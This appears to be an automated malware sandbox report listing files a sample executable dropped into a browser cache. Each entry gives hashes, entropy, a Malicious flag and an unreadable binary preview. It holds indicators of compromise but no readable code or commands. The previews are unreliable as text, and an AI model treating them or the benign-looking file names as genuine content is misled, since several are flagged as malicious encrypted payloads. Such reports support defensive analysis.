                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\f[2].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2262
                                                                                                                                                                                                    Entropy (8bit):7.909737467875713
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:6HKSeLdnTfzdvl8b+OJhHIxl8bp3qdq9z5QxD:kKSe9DpcdHIxk3qdUS5
                                                                                                                                                                                                    MD5:AABF8B22C74185A77A8D97EA1F240AE4
                                                                                                                                                                                                    SHA1:777C3F98494008B4E3B1A0403A7470351E249B3C
                                                                                                                                                                                                    SHA-256:FFF801403CD8341C2F4878B0372F642F002C0D86D92A516E4381894C6FE672DB
                                                                                                                                                                                                    SHA-512:13D8A8C86827EAB1D09FAE5A49E0BD04784792E91506AB1A0CF1BBDF932B0C96FCC5D4D92A25C883E129AB9FCBBBCD1A0C6F9A43175A7B4186943860E2A20294
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: &A. .K..Y.Q..;AE.E.. ../hg......nBI............(.[..{.Y."6..(.O...._.P...HjL............ovm-/...(:/U|1.h.t 2.....]W.Q.6.c.(].rs..Cl)6......*-AM.R:}............{<.yPL....I...'h..NS..'.w..:..k74tM%.x.Uj+b...}J`H..,NR.'....c/[.d...0...~V.k..}..Z.a~...}tl...*..*/.r.$...Wd6..)....H.K.)....`...B...t}.$S..J...a..]i.......H...S9.l.e.../.4......).......D&....s*u.].G.'@.[\..+'...m..C......I..R.i41t=.a[.z.....[...cI...K..'"%..*...7_.r.....I..{.^..L.....c|.c..Gn...6a]..G[....o.R'..b..i..O...Y[M.,.p........%1..rl....FH...cV=.."A.l../..O....W\.0/WO.#.@.JA.]bC.1k.~.fiosj.5K..U.i.;-...Y.!..z.....^.6..../7...L.....V.....'e..jk....,...h:gUa..`..E0..^....\......."...C.Z..(..~.@......p._B.!.*.K>..B.r....X:.@.'......C....W.2l7.I.7.4.&3.."..]......?=....:j%...A.=^j..v.........C/...C...I.G.@_.1.}..L....b.%...4tzWi.C.0........j*.a....>Q..$.n-..L%.Tn}..K......jj.;7...)...>.o.v...=..N.v.0N.@/N. ..S..ZhJS'..$:.&...0q..<.....[a.q.|.5....?E.:-...-...Vh.....)5%.{ .k
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\f[3].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):30245
                                                                                                                                                                                                    Entropy (8bit):7.993691394615358
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:V0wmZnsT2X6LcMn/xrXGwEUiTIEJJwXxn+hAM8L:1mXX0cMJrWnnIEu+D8L
                                                                                                                                                                                                    MD5:E8764895717F90ECE83048CA380D4D19
                                                                                                                                                                                                    SHA1:08070A1CBE5F26EA059127588F472CE4E42A3B2E
                                                                                                                                                                                                    SHA-256:BCC2AC57FD027C63D81D0EE1D2932A5CF67A492B62BBEC223557CC082E4DE8DE
                                                                                                                                                                                                    SHA-512:B02B114B92A29445529A731616A659E7F9A447A526FC619ACC161498A1BBBAA55FF58D00ED72A4B396334307123C10E4DF428B749D62E3FC4C17D4161A2052AD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..o..M....h.g.1.8{...=....._....B..(...5..*..Av....'.!.=.."..T.....1..b"l....o..5D [%Y.M.>.4n......p_...j..%1.@.._%...A..h.{@Q1.s...C...1.sC.r.O.....R.*...6?....'.'...A.+...flP.XZ....n#....2..F?}.!D..R.q..R..Y..U7...(.r[.<......P.......}H~..d'. ...$....u..|.[...x...ig.r..Z..gB.)`$&{.E...3...zC.d...t...aU..S.Gs.M.b...g..O-.).%..G.....u....[=H.]>d<.6..!.To...0\.......&...M..7.....%.Q.M.....H.'...Ij.(&gm(.n](.....>d.B.R..71..@.O.".-.5..a.f..0y..D.).....X)X...57.....cx+.H.SIF.D+...h,...4.|....m....G[?q}.H.@X.].......b.x...lZ.Ib-_Qr...........PW..?..{.R..C.}Z..g.)%b.P._.....E../s.....B...AR..C.qi,.bzD...F_.....}..D[.......2.3!.V.......U^...K......r...b|.2.FPzN..*.....n.l.0.3.!./E....a..H..B...../..<->... .S~.@.6....Gq.S....L^........\.{.o9m.?.,...g...V........&...j..dO..Z.-.0#8....ve.r.G....Mw.KH..2....W.).z..'n*)..K..3...t.d.H...b}......X\...C..w......^.g..Kk../{.cwA'....v...V......5.....uk....a..:.E.$...v.0$:9-=....J.,. .q...t....r.k.j
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\fe-a5cf09[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):133494
                                                                                                                                                                                                    Entropy (8bit):7.998629791429404
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:FNH+fdE5gy+i6F1UUXkVPmpFJZXOoDOBskiDu20+qaOJCqt:HH+fdEN+h1UUXc+HXta8620fR0qt
                                                                                                                                                                                                    MD5:9EFD5507CFCE0E7D25EF23A56FD6E9A6
                                                                                                                                                                                                    SHA1:F94587F867EA829BD32EFFC035A1C73E684E7D4E
                                                                                                                                                                                                    SHA-256:8A365848F2DFD80BAE5085F54FBFEA7C6FF27DAF96C9861D3F36B64C036352BE
                                                                                                                                                                                                    SHA-512:E81B3B7003099D8610BE47182A93A96F6B33CA9A0CACB1055100F02AF071C52EA4FBAD17EA4F66E14525BFF017021B63724BB8A14BD30E0191FF118B1FA0540C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...?.q..PL..[...#.V...D.Q..*.[.j.4......5..)xb^{..4q.R...{.h2.d.H.......e.....M@4.&.d.."h.i..._Mp.k..7......jK!-K.w...\....E@.L%.R..?....5a"z9.....gI.J...WH..0....Y*.9.....H...N42.....|....H.....zJ,$(.{./".7.....|C.C....z.9.......W+.3.q1,.p<.Faf7.>].%C..........D1....(..al...wa`........_.;VG....z..dq...........oB.E..Y.:lAm...j..e\W..i3c.Tl-......O.0^..V..:..%....1u\...,.%....*..~.>...".T....U.ft.(..4Y..R.x!......{.....~pk.._~.5...RW.n];3.H. T<.rC....g......9......w.1.#......;.9.P*.e.2 ....6....J....4.7>[cJ...9gB..5C....D..&..I3.b.v........'H..Q`q,.ML\..@..H.e.s6.n!._..#..bL..`..^....B....~.t..0.....g..rv.%Dt..U\F%.v.....tTy..M...f..Qs..]A5..y"......q.h..C{...;VT.e.......[..................P.x..}.e.<.~W.F\.!9!Pv...3un..m..-...@...E.j..x#s. .O~.)}...@}.d...}....*.".P.........H.!.......d....*.i.|.g...F5S\}3.}.A|.."g$W.x...K.Aj....).'.6.......`.....d(P...p....x..e....z@...8.m..zZ&.=p.E;=^7.xk}W-w......".(...qI(MH..+.}.....pZ.._.s.F U.N..T.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\folder-applications[1].svg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2803
                                                                                                                                                                                                    Entropy (8bit):7.937350305517578
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:IQVpRRgG6ZjkTD7/232slhL1Yhon7i/Pc3p8Jr9tU++cmDcw+DIS0D:LVbuhE/2GE1cTE3p8L6lGg
                                                                                                                                                                                                    MD5:FAEB54EA8E99A8B62E2767757DFF4ABC
                                                                                                                                                                                                    SHA1:685D3E4776E0F57DA5A02D7CAAFADAF959D15C51
                                                                                                                                                                                                    SHA-256:596F12193EB1989548367877D823951F4D2755DBFDE884EC1E5FCA211C083FBA
                                                                                                                                                                                                    SHA-512:A21031D11330A844624233A4CF20DBE58E05F26FE3786C7719D820891A60CCEE5DD1B77BD2AB90DFA592581F1B8C55EAE206053114D9FAE5A05011383830F1A7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ../.-........&....p...v..a|..k$.....T..(_...^....v..c...p!....m..1J....Yt>...M..Z{:.L......!..xVD....PT.b.l...ws[...?.....CB*.n...^Ma.v..z..B...+...w...'.i.,r{\.]...48.b.-.C.W..\%..*..a.U[......!..%s...3.>..;..^..5V.eW..b.mxQ...q^:H..N.p...H.].F..%....A...X...iN...yH.7wI.Pr..h.&!6...Fk..\Aq.D....K?.......FP.>r)..P9</.&.9..j...PV..o.."x.n F...].C9|.r....X.P1c....;E..|P......$t(.B5`....P8.....(...$.h.$l./.....9.X.-.c0.+U... .j..3....~.`.*..X|....u.x).-....r...C.T-..N.bs@.J..~.......w./...ep....d.F(.......5}..dU.%.<W.Z}T...I-...'..t}.m.Dz.(.r..T..).6...).[...Q....2>6...j.\A@g.....YD.....~..b...E...J..?..S.J...b..&.X.l7.p...C.6.'.G..4.!.k.Q.......".@W)!.......!.../,....X.9.....v%EM.)hO.r..........|.........x..../*4`.S...T..U...fq.7(.3.sp.z...E.2i.LwR;%.[.:.......4..Rm.f=...0....K...{4...........F>...n.f..........#.6.....<.?4..K.........k.E:....0...G..If&..Z......V.$.;vPS..%..X.a$.L..}VG.5...l.}.[....G..k.+..K;...O}_.2.u...T....N.QV<.@o.k..W..V..25.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\google-chrome-logo[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3074
                                                                                                                                                                                                    Entropy (8bit):7.939274928727481
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:m1eyXZguuw4nrYt0dmDU8R+zIVHS8mu0rsX:Mpguuwbwmo0+z4osX
                                                                                                                                                                                                    MD5:585017F5E59540AE7FBE32F86BC639D3
                                                                                                                                                                                                    SHA1:AB5C9A4250A954B0C6E2957B2EB5BCC079A54545
                                                                                                                                                                                                    SHA-256:0B59D7F22FED0DB026D7175FE819F2A3E69452F0968CF8A25E87A24D41159C11
                                                                                                                                                                                                    SHA-512:6FD4295C1035FB18FB5720646447438F5B581C7B29B3C14FA0CA21DEDC9FEBC7CD1CE61CEDC74EF6743B7F018B5E1C17B0DFF8619A670A482FF94C2CF6F4A5B6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .@.....f.&.=..7..@!~5.#.......f..]OR...r.wM.%H.>A.'.*4.......&a.e....R..F.._.:~.!..l...%.bu...........q..m.8...2..U.9.....F..c...pr[g=..N..(~..P..w0..+.a..7...V_G...s#^......]..4........{..TXx.O.%c5.=e6[....S..8sJ#[O..q?.9.h..D.%if...s....TB..Q.Xq*x."I.fB...'.......}.T.i..,.t.7...[.@.w..9.zb..i$..p.<.N8.`x.. .c4..z."|..o....V.=3...2.8.._.'7.2m.Y..U.iZfZ.a..6......q.YF.......P9..S.....KL'..K..........B..O..@~\.2..T.0.h.Twr'......i".:>1{r...._...Of..%0....C.w.SH$..D.q5...*..d....."p...c......O.a.rm.....j.......H........tx..QR..q.'C.a}.u@.6....h..!K....H.......j1l....P:......p....,}....mr.J.Tg..[D.~.1.B<...F.^..O.'..H.BX.(..........;.....s.R8Z..u5'Y.....h.r.W1.n...E...{$.Zo...z|....p....*...F.y..e.vSf....^xF..e)...,.P..x.HpG-.Kg.\.'s..\3.|S\'.c..?.`......N.9....:...).6..N.K.d.%...E.)c.6......3td$....I...r.W..Fc.h'..)y2U..T.A..K^...h.2...b.v..$q.r[. ..M:.2.../pqsk.I@,.).C..&Q..%P.g.w.~......{_..&CA...c.A..P...l....R|V...(.... .z..O/..G..a
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\google-dev[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3116
                                                                                                                                                                                                    Entropy (8bit):7.924042366303664
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:JVWnW+yzwm0YQnGzICSYPoV0e7kA28sz7jGTPirAza7v3bdYcZgdx+HD:JVUW5wm0PGsCeN28szmzisEFZwxa
                                                                                                                                                                                                    MD5:F4715CE47A4022C70F767D22533C4814
                                                                                                                                                                                                    SHA1:A26160C587372A1D4E15D99B2442A78FA0EB3439
                                                                                                                                                                                                    SHA-256:895861AC66D8C8523A2AD708AF304A279EFCA5F1A41FF323F49B362C76A4C87F
                                                                                                                                                                                                    SHA-512:C3B43A58881A52DA14EC852BA4D3D26D849CF46B701ADE49877BA1027545E1B5A16A848F0C86F0342804E592F0DB1A98877B42D26C773D9AF3183A610FD84BA0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .5.j....p.%.d...O{,.dT..5.^..........D.. .Q!(.U0..}!....e.I.........}..&*8.o...O...njU....+E?1....;...^C..E..f......*e..i...F...o..vQ....'..k...=.N.D..h...Y<Ph`.7...'..\r.....]..WH)~t{....K..@.......u.>.......f[....<ZA..n..J..._.dbF\]q.wD..#.=.L!....D..t=X.8...!.^.../..Fr.^M..6....z..<.y...j.E.3.y..~B..].V..b....^.H,q\.].A.6....y.....b.....b"{.x.......xF.c..A.._.lH.F.]....$er!.g.K0m.:.=.j%....B...5.%4+%...Q..V.-....u.ZM+#r.g......79......y....,..B.......g.t..eC.E.O..h...^..)........S......WJ. ...Y...V].E.^..%.@..U..H.....J....K?.V.........A....6...).t2.P`...............e'.h4.>....Y..l....4...".lf....jUz5.,!'`.'^.J.'.....l...zO....!....f..1....bI+ro...(.,.q.....|...t...c..:.Z<..`IO&,P.0.......35..n$.."."..D.<5Es.ZQy... ..i.U.8..l..'.)....LUo.".z>.<. ..e..*.@g.~...D.Hp{.....bMB+a,.].......-(....+...oFR...l\.)qyO..88#.\$t0e.]7.K......sM..tb..d....n.....}.....s...n*SCn..p'...0...Jk.5.<A.j...!+..#.......U.WY.4....?.....{8...`w)Qt...d..J.%.2u..<.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\google-enterprise[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2835
                                                                                                                                                                                                    Entropy (8bit):7.935536586129381
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:gClODD+nAX+XIfV4cyKxKCmzD3omgYZmGEX8cZapwFyhWotDGZJA8GrgSD:gCPAX+Xu4cyUKQmcGEX8cZapw8soSJu
                                                                                                                                                                                                    MD5:B24A20A82A334BCAE2F1D67479724CB9
                                                                                                                                                                                                    SHA1:BE565AA4789B83483C77324D6F169CC6467FC6CD
                                                                                                                                                                                                    SHA-256:3BAF749233684BACF8F8FD80E8E974279A46C2653FD29D1B0C9E0E277B9F48A5
                                                                                                                                                                                                    SHA-512:1EDC3791235B9B25A3E13F70A44E82DFEC30BCD991AD24C7BA9E06546B5EEDA11A5A33ED30493E6A4222B4DD51E9829E4AB9CFC87AAC97BF405A5470DC70E87B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....h.....!v.h..Sgg......u.h..<.i...gp...8.>P...].Yq.mJ..<..F..{....3}...7.x%..nhbE.3.N.....O.i.F.YZ.(.a........F.V']...$^`9......[ ..w*(.'!J...(:.....873.t...w.bH...].S..,W.....0j..X./.&..h{..U......P!..K..j/.3mg....3.....:.I....6...Q.Q..N{.h.>.....&.r..>.Z.........s.....k.......;...\F.;..6.).BG......R..pQ.,.Ze.....aV..:@4@..:..kz.."d.O...k.JY.9.6m"I............).........B...{....R.).^@k.<.......T.w.V.q{Tk.^~3.?@|.-.~...C....s....Z..wZJE..Wr...K..<....S...B..#.7u/5.....u.......(..[\..X...`e..[ <.w.`.M.........._.|......v...[......6..fivA".Ma..S...."D....QJ...dI.......w..LB.c.J...1..\.....v...1OM..N.../8B..S.v?#~..0.3.B].-./.{..O*.}.5.3&). \07..,..".....{Z)..............W..>.P.W......:.3....;.qM}..@......v..R..1....8}.Xr.:.0.....6.\..\F.!W...b..c.....>.E..vG..R.UZB.....m....72...b_.:.*.....r...Y".H.;..X...rm.....*....e......].R.....S../WX..1....c...`[...j@......LNng...!..7.M.D5$......c.U.....!.*f@C`...>......t...fJ.X..B.f..h.M.LT{....r={_.Tm
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\gtm[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):110905
                                                                                                                                                                                                    Entropy (8bit):7.99843584087259
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:HqAziOgPYfi/lKYE5zO+uP+LwmFb3fIx7SyO:HqAzib1K5zO+3LB7fIw
                                                                                                                                                                                                    MD5:48EA595EBCF5A55DECB3571A448231C1
                                                                                                                                                                                                    SHA1:7F0ED47861BBE86636F17C611D3D6FB4FB310DDD
                                                                                                                                                                                                    SHA-256:190FA858899EDDB8E64125791E25224707B3D91074225E41926DB07CF4688C00
                                                                                                                                                                                                    SHA-512:9E52FFDCAF008222921A1FE1505E7405F9C056937AFCD7A118F2773E278378845B8013705ECCB913F7907A1C400D6ABCD7C72CF1CF9EFAD50C5AE430BF8BE844
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .k.[Gn..1$>...U.k.]O....h...?oa..s.*:..J.j..`.G%}}?..q.>I..;..Q.]....[..t[.)........G.dc.........E=...@u}...k_T."_ob<&C..*.....tZ.G.X....L".y......)..;.....EUJ....5.BF(R.!.............t..j......'.Y.b..w..,.0dgKl.s..5.(N.z...ii..@.n....W.;7]......;*9.h...Z.......:..N.T..r..e.;M8....q..p..a.....y|@.`..Lo.X.5qc.?..e.`U.....{..68...).O..=....hF..V..<3S.+Nh_....^.yw'O..8.+..2Qr2........,.{KP6..&.VfJR.`$.m....g...6..I.......k.L.j..~...L..d0j.1`.P.H......X..Ta.....".pU,.].+_Z.<.c..J...p..j..H..H.km>...dm...B.?...X..u.?....*j...t.96.........&..'...CF.'...W8..G.``....Y..:. ......j........}..F.$....).....=F..s.U..iy.W.....,....b;....N.R......g_...u;..+C..~.]...Nm%..l)..Xe..+-a...u@p9\J.z....'.OAV.q.H[n..s."..'*.D..6F.@NM..C.K>...2#.VQ.~.M..t.&..B..k(Ll..[;.l..>vq*.o....QhM./..ic.hz..d...V.y...z..v-..H"...'m.=.e...>.......1.....W.8N.]$3.>_.(.4..c.p.D=."|..n.`..7...../..#...W..l...g(.<$;O{.....i.....x.#6.OG..0 ........VacWiD.#q..X.v.p!q..oH.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\homepage_privacy[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7557
                                                                                                                                                                                                    Entropy (8bit):7.976976105408618
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:mXlHV036f7sCDrGb1y0kyRwow8PVARu+Q+GfU4QTithe:m326f7HrqAHy6ob0uB+AUxTit8
                                                                                                                                                                                                    MD5:5E097B291B627FF054CFB97959F64FA9
                                                                                                                                                                                                    SHA1:B71B13AD47A657DA02F0EF16B48947BCC0B69865
                                                                                                                                                                                                    SHA-256:B6EF51343F75F8E4D3B5B2485D4CA1636B1AC9DCEAF6605448A7CA73B2D4147F
                                                                                                                                                                                                    SHA-512:E524F2465682DA380AA545C4D08A6B0EC6C4336B6D36B25802801C81E5646A97E705884EEADEADE4FB295AAE68BB6FC23E86906747520507CD42F86D2FD6B638
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......[....bn...<....E..R'....=..i..n#o.y...oIZf]../.sC.....'...RzO.*../......za....u..b.....qLK(.wp.Xe.M.`}.5_...,.g...m}......p.Q...hyYk.@.a.}.2.....+..[f.P...R......j.........X{..%M-J..*.M.[.cC..Y.P.H.P[.j..........Ja...5...U...cr..p.\...S...p.<^;q.c<c..U;.....[..$.I/..!$B]:...Uu...`5.Z.....F......[.......P;.i...?..."Q.{.`eT.I..."..1.B.K|W.v&...Q..=S........6=...........(E..J/...G.3.$P..KFq@.4....S....7.v..y...$.>...e......&...v......?....Z.....&....#Qg...!".w....W0[..+&.:.>....~.iy[...2..x......'.t6.zd..e.H.c..W.....0.]z..M.9(.b.......?..x..7.U..[.............../.ilc@z.U.u..C..nF.D*l.2...^....%....;dX....4.?.-p..GH....[&...yFe....A.K>c@2.f.(.D..Y.0.mt.V...I..W..%..u-3.9o.*..D.1.QJ..Yj8...!6...aK..U.4.D....Y8N.WEQ......z.N...B.K....R8K..2...a.-.a..4.Y.SiYn.4V..*>!$..(...QyXdh...)<..9.|^.w..@.K..(...RdV+b.KAIZ..#q.V.^T.;B.L+.Z&~.+....J&.....~..............;..u.'...|...p6...0.'.p.m.X1..F.*.*.-.J....N...o.S..........3x..wE..<....nx
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\homepage_tools[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):19314
                                                                                                                                                                                                    Entropy (8bit):7.991095719195218
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:yWYRi1VeHX52YK50w75jN050cSq2PQoLPEAGDbP3Do2h0z:yWYRDX5w504q501q2PHzNGDTsX
                                                                                                                                                                                                    MD5:924534CFF4D5E2B93A7585CBCB7A34C5
                                                                                                                                                                                                    SHA1:D150DB8D2D3B8CE21BA3EBD0B8DBF4569EFB81D4
                                                                                                                                                                                                    SHA-256:B29E25ACF19C15E2738ABC0B89C460547E0F87FB04329FC5B06B860EA204D4D3
                                                                                                                                                                                                    SHA-512:16F31DE453B214F84CFF5675885FA21608D1424E946F8FA34D3D2EA6C5E4A56BA725D58EAB5986584E992C471FE47158B62C63B26CD847985DAA9DEAA4714CFC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .a..Htq?.9....I,...I5^..q.M...+..?.....K.i>.4........].?.A.A...{.V.Ib...[.T.~.,....<`......L.u..)....:.(E.c...h>XL.,..l...|k`...F.a......4.."..I.....<....z.h.pe.j...5.]4Fy+...^..fNV.H),.).:...a.f........h..t....y`./.......>V...z....P..+$.4...........*..i..A..gM....D..._x...w.k. ...S.jL(.....I|I...JN.&^......l.@.^...N.....ox.[.............3...~.u..}.d"....ih.v.......O./."8.=.......}..7IJ.K..\...,|...1.3wd%..KPet.12......R...)8..t.d.)...@._..Ls..B.5Y.l..cO......v.....M.U/..{..#.h..G. .....;T....E'.^5.H1.1.3..7..&.~.c..*1...ygbo.'..Z.`..d..H.....!qk....2.(.j........ ..wFr..........<G...9..&...-9.?:.np=.....z"..G.....2..t...x'!.H.[.H......K),r.L...l.M.?`a..~.$...=....ytx._}..Z.......^\....S.N..G...Il.....s.\..k....[.6[C....";D...M..\TT.7tp.>.u">..W.HOG...-)....1.HL."`.J.7._VT&j.....m.-.......}.....&.af..C..`.<T.}Fk..)#.8.%.......Nn.|...........Gz|..YO..vL9...RcO..@0...b....T...cS...>kaG.k._.C.!.m...Q.n..1..l.....X......?.N.Y.o....bs.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\icon-description-white-blue-bg[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1270
                                                                                                                                                                                                    Entropy (8bit):7.8316711231609695
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:oK74aw0PEydrPpdOPpphnvvhoOi+IYOweLOKLnMFCoLSnuK+dbD:l7g/MrPzOhvvhoOtlOwXCMw+quDD
                                                                                                                                                                                                    MD5:6BF51D1BB83CF27C9AD21D2FA1A6126D
                                                                                                                                                                                                    SHA1:37EF8D4BF3F3C629A6F946F7B195D54492C143CB
                                                                                                                                                                                                    SHA-256:3E7C4FF55E73BF7BC78C8C44D8092DAE8F4D3F74E521BEFBC63D7002DC17A92B
                                                                                                                                                                                                    SHA-512:0D44C7CF1ABEC8F9B7EA982219BB2D1242A6FE499A88222E493838DFDB15293D2BC2F6113C9C42A83053457AA24A585B64AD2D8D72C1EFC9CEFD86C907C63B1E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....]p..|....<...x...v..G..v.-....@.~:.. $Qm..]...#....".9U.i..{..?.....k.?.$...,.x.D&.A.$`_....]...9..~..s.c..4>.....a..e..a8=s....)..*a.vkI..FbU...}L}.-5..d~.e@&Ti.!..o..@N..\...)ZMQ.p...#......YK..(...[wW.~B..M.0-"{..Y:...P2..>...Z..Q.X...J.[/..>ToUK.pW.Y.$..g_F....;.R..`.)..9.q.MY.A...Gd...C...[.cZm..,..X.|...I.f..@.......df..8....c...7..=/.Ce...T...i..2.'....H.E~...1<...D...I..N...T..#q.j5......>....B.O......f....X.....n6~...lt.~RyP;.p.N&N.L*....@R...3.aF..*R..k0.1.k.....o=^.Q.OF....i..t9.....=2yWL.T....hk...oL..%c\.....6k4'.os).2p.e.o.@.Pv.u.LE..Q...*T.q..S.'..!./,. s:..8Ul._..I+6.:.2.EVQ..EA.7._D.X|...'.8...j..R{PI...e_.U.....n...tFX.@.a.9.....m0z........,.... .(...u.Mh.Q.W.CM.X.|..=.o....:.1.:.`.n_..9[c.....2.F.n.j..)[.`].r..../.MS)..'dx..m.).&9.Bdt8Q....x...L...k....`..`*....km...N.....V.../Hn.Z.RuP]..$.J....iJ~L.Hg...e.#....+.Z.1.3NN.K..pW..'.S.r+.+.....p.[.DN..).v_.N.e.T.[]rL..q..@.~...l...G.b.b..CD.%E.....q...>.s.I.c}......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\installer.min[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):52834
                                                                                                                                                                                                    Entropy (8bit):7.99635513586918
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:SBQr3UKpthDIZVI3rbOv7b54yJGLXlTZIs/XB+Ddo:qS3z843rgWHIuR+Ddo
                                                                                                                                                                                                    MD5:791CC06CF0296B0E37CE98A56473F9A1
                                                                                                                                                                                                    SHA1:15A71031859B02174B6960427B4C6F737FDFAD66
                                                                                                                                                                                                    SHA-256:F6ECD541743CB8784A0E8AD74CE89E7F26BF35B246FF34A75F4851D996488497
                                                                                                                                                                                                    SHA-512:35D2B9A95A7A740912E85812B6677F018EFA60F2E6DF02ECC6470DD676A51C51A47070B12B72FCEDF7909B36A11FC7BB986540772AD9DC7CFDCEEA6B8C13BC8B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
